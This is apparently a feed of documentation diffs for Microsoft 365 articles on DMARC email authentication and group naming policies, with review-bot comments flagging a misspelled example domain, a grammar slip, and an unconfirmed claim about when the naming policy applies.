@@ -30,7 +30,7 @@ Domain-based Message Authentication, Reporting, and Conformance ([DMARC](https:/
## How do SPF and DMARC work together to protect email in Microsoft 365?
- An email message may contain multiple originator, or sender, addresses. These addresses are used for different purposes. For example, consider these addresses:
+ An email message may contain multiple originator or sender addresses. These addresses are used for different purposes. For example, consider these addresses:
- **"Mail From" address**: Identifies the sender and specifies where to send return notices if any problems occur with the delivery of the message, such as non-delivery notices. This appears in the envelope portion of an email message and is not usually displayed by your email application. This is sometimes called the 5321.MailFrom address or the reverse-path address.
@@ -171,7 +171,7 @@ Once you have formed your record, you need to update the record at your domain r
## Best practices for implementing DMARC in Microsoft 365
-You can implement DMARC gradually without impacting the rest of your mail flow. Create and implement a roll out plan that follows these steps. Do each of these steps first with a sub-domain, then other sub-domains, and finally with the top-level domain in your organization before moving on to the next step.
+You can implement DMARC gradually without impacting the rest of your mail flow. Create and implement a roll-out plan that follows these steps. Do each of these steps first with a sub-domain, then other sub-domains, and finally with the top-level domain in your organization before moving on to the next step.
1. Monitor the impact of implementing DMARC
@@ -187,15 +187,15 @@ You can implement DMARC gradually without impacting the rest of your mail flow.
The final step is implementing a reject policy. A reject policy is a DMARC TXT record that has its policy set to reject (p=reject). When you do this, you're asking DMARC receivers not to accept messages that fail the DMARC checks.
-4. How to setup DMARC for subdomain?
+4. How to set up DMARC for subdomain?
-DMARC is implemented by publishing a policy as a TXT record in DNS and is hierarchical (e.g. a policy published for contoso.com will apply to sub.domain.contonos.com unless a different policy is explicitly defined for the subdomain). This is useful as organizations may be able to specify a smaller number of high level DMARC records for wider coverage. Care should be taken to configure explicit subdomain DMARC records where you do not want the subdomains to inherit the top level domain's DMARC record.
+ DMARC is implemented by publishing a policy as a TXT record in DNS and is hierarchical (e.g. a policy published for contoso.com will apply to sub.domain.contonos.com unless a different policy is explicitly defined for the subdomain). This is useful as organizations may be able to specify a smaller number of high-level DMARC records for wider coverage. Care should be taken to configure explicit subdomain DMARC records where you do not want the subdomains to inherit the top-level domain's DMARC record.
-Also, you can add a wildcard-type policy for DMARC when subdomains shouldn't be sending email, by adding the `sp=reject` value. For example:
+ Also, you can add a wildcard-type policy for DMARC when subdomains shouldn't be sending email, by adding the `sp=reject` value. For example:
-```console
-_dmarc.contoso.com. TXT "v=DMARC1; p=reject; sp=reject; ruf=mailto:authfail@contoso.com; rua=mailto:aggrep@contoso.com"
-```
+ ```text
+ _dmarc.contoso.com. TXT "v=DMARC1; p=reject; sp=reject; ruf=mailto:authfail@contoso.com; rua=mailto:aggrep@contoso.com"
+ ```
## How Microsoft 365 handles outbound email that fails DMARC
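Review bot: the re-indented inheritance paragraph still gives the example as "a policy published for contoso.com will apply to sub.domain.contonos.com"; "contonos.com" is a misspelling of the example domain, and as written the sentence describes a policy applying to an unrelated domain, which is the opposite of what DMARC inheritance does. Change it to sub.domain.contoso.com. The step heading would also read better as "How to set up DMARC for a subdomain?".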
@@ -221,7 +221,7 @@ For more information, see [Create safe sender lists](create-safe-sender-lists-in
All hosted mailboxes in Microsoft 365 will now gain the benefit of ARC with improved deliverability of messages and enhanced anti-spoofing protection. ARC preserves the email authentication results from all participating intermediaries, or hops, when an email is routed from the originating server to the recipient mailbox. Before ARC, modifications performed by intermediaries in email routing, like forwarding rules or automatic signatures, could cause DMARC failures by the time the email reached the recipient mailbox. With ARC, the cryptographic preservation of the authentication results allows Microsoft 365 to verify the authenticity of an email's sender.
-Microsoft 365 currently utilizes ARC to verify authentication results when Microsoft is the ARC Sealer, but plan to add support for third party ARC sealers in the future.
+Microsoft 365 currently utilizes ARC to verify authentication results when Microsoft is the ARC Sealer, but plan to add support for third-party ARC sealers in the future.
## Troubleshooting your DMARC implementation
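Review bot: in the added ARC sentence the subject and second verb disagree: "Microsoft 365 currently utilizes ARC ... but plan to add support". It should be "but plans to add support for third-party ARC sealers", since the hyphenation fix already touches this line.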
solutions https://docs.microsoft.com/en-us/microsoft-365/solutions/groups-naming-policy https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/groups-naming-policy.md
@@ -23,7 +23,7 @@ description: "Learn how to create a naming policy for Microsoft 365 groups."
You can use a group naming policy to enforce a consistent naming strategy for groups created by users in your organization. A naming policy can help you and your users identify the function of the group, membership, geographic region, or who created the group. The naming policy can also help categorize groups in the address book. You can use the policy to block specific words from being used in group names and aliases.
-The naming policy is applied to groups that are created across all groups workloads (like Outlook, Microsoft Teams, SharePoint, Planner, Yammer, etc.). It gets applied to both the group name and group alias. It gets applied when a user creates a group and when group name or alias is edited for an existing group.
+The naming policy is applied to groups that are created across all groups workloads (like Outlook, Microsoft Teams, SharePoint, Planner, Yammer, etc.). It gets applied to both the group name and group alias. It also gets applied when a user creates a group and when the group name, alias, description, or avatar is edited for an existing group.
> [!TIP] > A Microsoft 365 group naming policy only applies to Microsoft 365 groups. It doesn't apply to distribution groups created in Exchange Online. To create a naming policy for distribution groups, see [Create a distribution group naming policy](https://docs.microsoft.com/exchange/recipients-in-exchange-online/manage-distribution-groups/create-group-naming-policy).
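Review bot: the added sentence changes what the article claims, not just its wording: it now says the naming policy is applied when the group "description, or avatar" is edited, where the old line listed only the name and alias. That contradicts the unchanged sentence before it ("It gets applied to both the group name and group alias") unless the intent is that any edit to the group re-evaluates the name. Confirm the behavior, state it explicitly, and drop the stray "also" in "It also gets applied when a user creates a group".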